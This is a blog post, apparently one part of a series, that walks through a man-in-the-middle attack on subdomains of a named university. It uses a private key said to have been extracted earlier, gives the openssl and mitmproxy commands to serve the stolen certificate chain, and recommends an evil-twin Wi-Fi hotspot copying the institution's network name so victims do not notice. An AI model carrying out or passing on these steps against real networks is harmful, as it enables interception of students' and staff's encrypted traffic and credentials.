Continuing with this post, we will now try to perform a MITM atack over the vulnerable subdomains with mitmproxy.

Building the full chain

In order to perform the attack, we must first assemble the full chain of the certificate, so that the "victims" can validate it. To do this, we have to download the already available certificate from the vulnerable machine:

openssl s_client -showcerts -connect sakai.itba.edu.ar:443

Once we have this data, we can begin assembling the certificate in PEM format:

-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----

The RSA Private Key is the one we extracted in the previous post, and the Certificate sections are the ones returned by openssl in the exact same order.

Executing the proxy

When executing the proxy, we must instruct it to use certificate chain we assembled:

./mitmproxy --cert=itba.fullchain.crt

This will make sure that whenever a client acceses any subdomain of *.itba.edu.ar using HTTPS, the proxy wil return a valid, trusted certificate, instead of a self-signed one.

All what's left is to configure the local machine as a transparent proxy, and no victim will notice you. A nice way of doing this is to make a Hotspot, and choose the same SSID as the institution. Eventualy, some device will roam to your network.

Next Post Previous Post